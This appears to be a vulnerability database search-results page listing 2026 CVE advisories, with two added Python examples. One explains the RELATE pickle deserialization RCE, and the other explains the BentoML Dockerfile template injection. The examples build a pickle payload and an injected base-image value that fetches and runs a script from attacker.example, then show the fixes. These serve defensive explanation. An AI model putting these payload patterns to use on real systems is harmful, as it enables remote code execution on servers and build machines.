
250794 matches found

CVE • added 2026/05/27 6:50 p.m. • 15 views

CVE-2026-45102

CVE-2026-45102 concerns OneUptime, an open-source monitoring platform. Prior to version 10.0.98, OneUptime used the Node.js vm module as an isolation primitive, which is not intended for security boundaries and can be escaped via error objects and infinite recursion, potentially enabling remote code ...

CVSS 9.9 · AI score 5.8 · EPSS 0.00062
Exploits: 0 · References: 1

Vulnrichment • added 2026/05/27 6:50 p.m. • 8 views

CVE-2026-45102 OneUptime: RCE due to Node.js' vm module escape via error objects and infinite recursion

OneUptime is an open-source monitoring and observability platform. Prior to 10.0.98, OneUptime uses the Node.js vm module as an isolation primitive. This API was not designed for that and can be escaped via error objects and infinite recursion. This vulnerability is fixed in 10.0.98...

CVSS 9.9 · AI score 5.8 · EPSS 0.00062
Exploits: 0 · References: 1

GithubExploit • added 2026/05/27 6:44 p.m. • 61 views

Exploit for Incorrect Default Permissions in Supervisord Supervisor

LAB 3 - Supervisord XML-RPC Remote Code Execution CVE-2017-11...

CVSS 9 · AI score 7.7 · EPSS 0.94239
Exploits: 10

Vulnrichment • added 2026/05/27 6:31 p.m. • 8 views

CVE-2026-47161 RELATE Vulnerable to Remote Code Execution (RCE) via Insecure Celery Pickle Deserialization

RELATE is a web-based courseware package. Prior to commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb, RELATE LMS configures its Celery workers to accept and deserialize untrusted 'pickle' data. An attacker who can reach the message broker can execute arbitrary commands on the host server. Combined...

CVSS 8.7 · AI score 6.5 · EPSS 0.00607
Exploits: 0 · References: 2

Cvelist • added 2026/05/27 6:31 p.m. • 45 views

CVE-2026-47161 RELATE Vulnerable to Remote Code Execution (RCE) via Insecure Celery Pickle Deserialization

RELATE is a web-based courseware package. Prior to commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb, RELATE LMS configures its Celery workers to accept and deserialize untrusted 'pickle' data. An attacker who can reach the message broker can execute arbitrary commands on the host server. Combined...

CVSS 8.7 · EPSS 0.00607
Exploits: 0 · References: 2

ATTACKERKB • added 2026/05/27 6:31 p.m. • 5 views

CVE-2026-47161

RELATE is a web-based courseware package. Prior to commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb, RELATE LMS configures its Celery workers to accept and deserialize untrusted 'pickle' data. An attacker who can reach the message broker can execute arbitrary commands on the host server. Combined...

CVSS 8.7 · AI score 6.5 · EPSS 0.00607
Exploits: 0 · References: 3

EUVD • added 2026/05/27 6:31 p.m. • 14 views

EUVD-2026-32628

RELATE is a web-based courseware package. Prior to commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb, RELATE LMS configures its Celery workers to accept and deserialize untrusted 'pickle' data. An attacker who can reach the message broker can execute arbitrary commands on the host server. Combined...

CVSS 8.7 · AI score 6.5 · EPSS 0.00607
Exploits: 0 · References: 2

CVE • added 2026/05/27 6:31 p.m. • 12 views

CVE-2026-47161

RELATE is affected by CVE-2026-47161 due to Celery workers configured to deserialize untrusted pickle data prior to commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb. An attacker who can reach the message broker can execute arbitrary commands on the host, and due to insufficient network isolation i...

CVSS 8.7 · AI score 6.5 · EPSS 0.00607
Exploits: 0 · References: 2

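The mechanism behind the RELATE entries above (a worker that accepts pickle from the broker runs whatever callable the message names) and the corresponding fix, as an added example that is neither RELATE's nor Celery's code. A recording function stands in for the shell command a real payload would invoke; the payload bytes are constructed here; the RestrictedUnpickler follows the pattern from the Python pickle documentation; the setting names accept_content, task_serializer and result_serializer are Celery's own.

```python
import io
import pickle

# Added demonstration, not RELATE's code. run_command stands in for the
# os.system call a real payload would name, so running this is harmless.
EXECUTED = []


def run_command(cmd):
    EXECUTED.append(cmd)
    return cmd


class Exploit:
    """Any object can tell the unpickler which callable to invoke on load."""

    def __reduce__(self):
        return (run_command, ("id > /tmp/pwned",))  # constructed payload


def build_payload():
    """What an attacker with broker access would publish as a task body."""
    return pickle.dumps(Exploit())


def plain_task_body():
    """A benign task body made only of plain data types (constructed)."""
    return pickle.dumps({"task": "grade", "args": [1, 2]})


def unsafe_worker_load(body):
    """What a worker with accept_content = ['pickle'] does: the callable runs."""
    return pickle.loads(body)


class RestrictedUnpickler(pickle.Unpickler):
    """Defence in depth (pattern from the Python docs): only plain data types.
    Everything else, including any function or class reference, is refused."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"),
               ("builtins", "tuple"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused to load {module}.{name}")


def restricted_load(body):
    return RestrictedUnpickler(io.BytesIO(body)).load()


def restricted_load_refuses(body):
    """True if the restricted loader rejects the body instead of executing it."""
    try:
        restricted_load(body)
    except pickle.UnpicklingError:
        return True
    return False


# Celery settings: the broker is the trust boundary, so workers must not
# accept pickle at all. The restricted unpickler above is only a backstop.
VULNERABLE_SETTINGS = {"accept_content": ["pickle", "json"],
                       "task_serializer": "pickle"}
HARDENED_SETTINGS = {"accept_content": ["json"],
                     "task_serializer": "json",
                     "result_serializer": "json"}


def accepts_pickle(settings):
    return "pickle" in settings.get("accept_content", [])


if __name__ == "__main__":
    payload = build_payload()
    print("unsafe worker:", unsafe_worker_load(payload), EXECUTED)
    print("restricted loader refuses payload:", restricted_load_refuses(payload))
    print("restricted loader accepts plain data:", restricted_load(plain_task_body()))
    print("vulnerable settings accept pickle:", accepts_pickle(VULNERABLE_SETTINGS))
```

The run shows the whole problem in one line: pickle.loads on attacker bytes calls the attacker's chosen function before any task code runs, so no amount of validation inside the task helps. Dropping pickle from accept_content is the fix; the restricted unpickler only limits damage if some other code path still unpickles, and the broker itself still needs authentication and network isolation.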
Vulnrichment • added 2026/05/27 6:29 p.m. • 9 views

CVE-2026-42879 FacturaScripts: Authenticated Remote Code Execution (RCE) via GIF Image Upload in Product Images

FacturaScripts is open source accounting and invoicing software. In 2025.81 and earlier, an authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image using...

CVSS 6.3 · AI score 5.8 · EPSS 0.00046
Exploits: 0 · References: 1

CVE • added 2026/05/27 6:29 p.m. • 14 views

CVE-2026-42879

CVE-2026-42879 affects FacturaScripts

CVSS 6.3 · AI score 5.8 · EPSS 0.00046
Exploits: 0 · References: 1

Cvelist • added 2026/05/27 6:29 p.m. • 38 views

CVE-2026-42879 FacturaScripts: Authenticated Remote Code Execution (RCE) via GIF Image Upload in Product Images

FacturaScripts is open source accounting and invoicing software. In 2025.81 and earlier, an authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image using...

CVSS 6.3 · EPSS 0.00046
Exploits: 0 · References: 1

Github Security Blog • added 2026/05/27 6:24 p.m. • 55 views

LiquidJS is Vulnerable to Remote Code Execution

Summary: It is possible to execute arbitrary code with crafted templates. Details: 1|valueOf yields this when the filter is evaluated: {% assign r=1|valueOf %} {{ r|inspect }} ...

AI score 6.2
Exploits: 0 · References: 3 · Affected Software: 1

OSV • added 2026/05/27 6:24 p.m. • 14 views

GHSA-GF2Q-C269-PQGC LiquidJS is Vulnerable to Remote Code Execution

Summary: It is possible to execute arbitrary code with crafted templates. Details: 1|valueOf yields this when the filter is evaluated: {% assign r=1|valueOf %} {{ r|inspect }} ...

CVSS 10 · AI score 6.2
Exploits: 0 · References: 3

OSV • added 2026/05/27 6:18 p.m. • 6 views

JLSEC-2026-564 In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized...

In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT --kem=CMS handling. This can easily be leveraged for denial of service; however, there is also memory corruption that...

CVSS 8.1 · AI score 6.6 · EPSS 0.00227
Exploits: 1 · References: 4

PyPA • added 2026/05/27 6:16 p.m. • 5 views

PYSEC-0000-CVE-2026-44345

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, src/bentoml/internal/container/frontend/dockerfile/templates/basev2.j2 interpolates docker.baseimage raw with no escaping, newline filtering, or validation. A malicious...

CVSS 8.8 · AI score 5.9 · EPSS 0.00046
Exploits: 1 · References: 1 · Affected Software: 1

NVD • added 2026/05/27 6:16 p.m. • 7 views

CVE-2026-44345

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, src/bentoml/internal/container/frontend/dockerfile/templates/basev2.j2 interpolates docker.baseimage raw with no escaping, newline filtering, or validation. A malicious...

CVSS 8.8 · EPSS 0.00046
Exploits: 1 · References: 1

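Why "no escaping, newline filtering, or validation" of a base image value matters in a Dockerfile template, as an added example that is not BentoML's template or code. A string.Template stands in for the Jinja file, the malicious value is constructed, and the validation regex is an approximation of Docker's image reference grammar written for this example (an assumption, not the official specification).

```python
import re
from string import Template

# Added illustration, not BentoML's template. A string.Template stands in for
# the Jinja file; the only thing that matters is that the base image is
# interpolated verbatim into the first line.
DOCKERFILE_TEMPLATE = Template(
    "FROM $base_image\n"
    "COPY . /app\n"
    "RUN pip install -r /app/requirements.txt\n"
)


def render_unvalidated(base_image):
    """Vulnerable: whatever the config holds lands in the Dockerfile as-is."""
    return DOCKERFILE_TEMPLATE.substitute(base_image=base_image)


# Constructed attacker value: one newline turns the FROM operand into a RUN
# line, and a second FROM makes the rest of the file build as before.
MALICIOUS_BASE_IMAGE = (
    "python:3.12-slim\n"
    "RUN curl -s https://attacker.example/setup.sh | sh\n"
    "FROM python:3.12-slim"
)

# Approximation of Docker's image reference grammar (assumption, not the spec):
#   [host[:port]/]component(/component)*[:tag][@sha256:<64 hex>]
_IMAGE_REF = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?(?::[0-9]{1,5})?/)?"  # registry host[:port]/
    r"[a-z0-9]+(?:[._-]+[a-z0-9]+)*"                           # first path component
    r"(?:/[a-z0-9]+(?:[._-]+[a-z0-9]+)*)*"                     # further components
    r"(?::[A-Za-z0-9_][A-Za-z0-9_.-]{0,127})?"                 # :tag
    r"(?:@sha256:[0-9a-f]{64})?$"                              # @digest
)


def validate_image_ref(ref):
    """Allow-list the value instead of escaping it: the grammar admits no
    whitespace or newlines, so no second instruction can be smuggled in."""
    if not isinstance(ref, str) or len(ref) > 255 or _IMAGE_REF.fullmatch(ref) is None:
        raise ValueError(f"invalid base image reference: {ref!r}")
    return ref


def render_validated(base_image):
    """Hardened: the value must parse as an image reference before use."""
    return DOCKERFILE_TEMPLATE.substitute(base_image=validate_image_ref(base_image))


def instruction_names(dockerfile):
    """Leading keyword of every non-blank line; injected lines show up here."""
    return [line.split(None, 1)[0].upper()
            for line in dockerfile.splitlines() if line.strip()]


def validated_render_fails(base_image):
    try:
        render_validated(base_image)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(instruction_names(render_unvalidated(MALICIOUS_BASE_IMAGE)))
    print(validated_render_fails(MALICIOUS_BASE_IMAGE))
```

The unvalidated render of the malicious value contains five instructions where the template has three; the injected RUN executes at image build time with whatever network and credentials the build has. Escaping would not help here because a Dockerfile has no quoting for a FROM operand, which is why the hardened version accepts only values that match the reference grammar.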
IBM Security Bulletins • added 2026/05/27 6:09 p.m. • 13 views

Security Bulletin: IBM WebSphere Application Server and WebSphere Application Server Liberty are affected by multiple vulnerabilities when using Web Server Plug-ins (CVE-2026-8633, CVE-2026-8620)

Summary: IBM WebSphere Application Server and WebSphere Application Server Liberty are affected by remote code execution and HTTP request smuggling when using the optional and separately installable Web Server Plug-ins for IBM WebSphere Application Server component. Vulnerability Details...

CVSS 9.8 · AI score 6.5 · EPSS 0.0026
Exploits: 0 · Affected Software: 1

Vulnrichment • added 2026/05/27 5:34 p.m. • 7 views

CVE-2026-45087 Dalfox: Unauthenticated Remote Code Execution via `found-action` in Dalfox Server Mode

Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, when dalfox is started in REST API server mode (dalfox server), the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options...

CVSS 10 · AI score 6 · EPSS 0.00061
Exploits: 0 · References: 2

CVE • added 2026/05/27 5:34 p.m. • 5 views

CVE-2026-45087

Dalfox (server mode) prior to v2.13.0 is vulnerable to unauthenticated remote code execution. When dalfox server is run with the default bind address 0.0.0.0:6664 and no API key, POST /scan deserializes attacker-controlled options (FoundAction and FoundActionShell) into the scan config, then shell commands are execu...

CVSS 10 · AI score 6 · EPSS 0.00061
Exploits: 0 · References: 2

OSV • added 2026/05/27 4:57 p.m. • 5 views

GHSA-36FC-7WJG-MFVJ Pimcore has Unsafe PHP Deserialization in Multiple Locations Without allowed_classes Restriction

GM-374. Summary: Multiple locations in Pimcore v11 call PHP's unserialize on data from database columns and filesystem files without the allowed_classes restriction, enabling object injection if an attacker can control the serialized data source. Affected Component: Package: pimcore/pimcore and...

CVSS 8 · AI score 6.3
Exploits: 0 · References: 5
